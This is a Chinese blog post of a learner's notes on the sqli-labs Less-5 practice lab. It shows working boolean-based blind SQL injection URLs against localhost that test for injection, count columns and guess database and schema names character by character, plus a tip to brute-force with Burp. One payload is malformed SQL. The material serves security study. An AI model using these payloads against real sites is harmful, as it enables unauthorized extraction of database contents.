一.BOOL型-1
1.http://localhost/sqli-labs-master/Less-5/?id=1' 查看是否注入
2.http://localhost/sqli-labs-master/Less-5/?id=1'order by 3--+ 查看有多少列
出现··you are in .......表示成功
3.http://localhost/sqli-labs-master/Less-5/?id=1'and left((select database()),1)='s'--+
(1)手工注入太麻烦可以改为burp代理,用暴力破解,逐位破解
(2)select ascii(select substr((select database()),1,1) ='s') > 100逐位猜解
http://localhost/sqli-labs-master/Less-5/?id=1'and select ascii(select substr((select database()),1,1) ='s') > 156--+(此时是没有返回值的,但是返回结果是正常)
4.MySQL登录: 进入到mysql目录后 -u 密码 -p 然后回显输入密码
二.BOOL型-2
1.通过二分法得到所有的库、红色为可变参数
http://localhost/sqli-labs-master/Less-5/?id=1'and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10--+
(╯▔皿▔)╯和up主不一样了,苦恼ing~~
这里我忽略了一个事情,这个语句的意思是,【查询information_schema数据库中schemata表的schema_name名读取一个数据(这里的limit表示从第二位数据开始读取一个)】从第一位开始截取所获得字符串第一位的长度然后转化为ascii码与后面的数据进行比较,然后一开始不知道每个人的schemata表中的数据是不一样的,所以我这里执行的时候会和up主的视频不一样
这篇博客探讨了SQL注入的基本概念,通过实例展示了如何利用布尔型注入进行数据库信息探测。作者首先演示了手工注入的过程,然后介绍了使用Burp Suite进行自动化攻击的方法。博客还提到了MySQL数据库的登录步骤,并解释了如何通过ASCII码比较来猜测数据库名称。在后续部分,博主分享了如何通过二分法获取数据库信息,特别指出在不同环境中执行SQL查询可能产生的差异。
1万+

被折叠的 条评论
为什么被折叠?



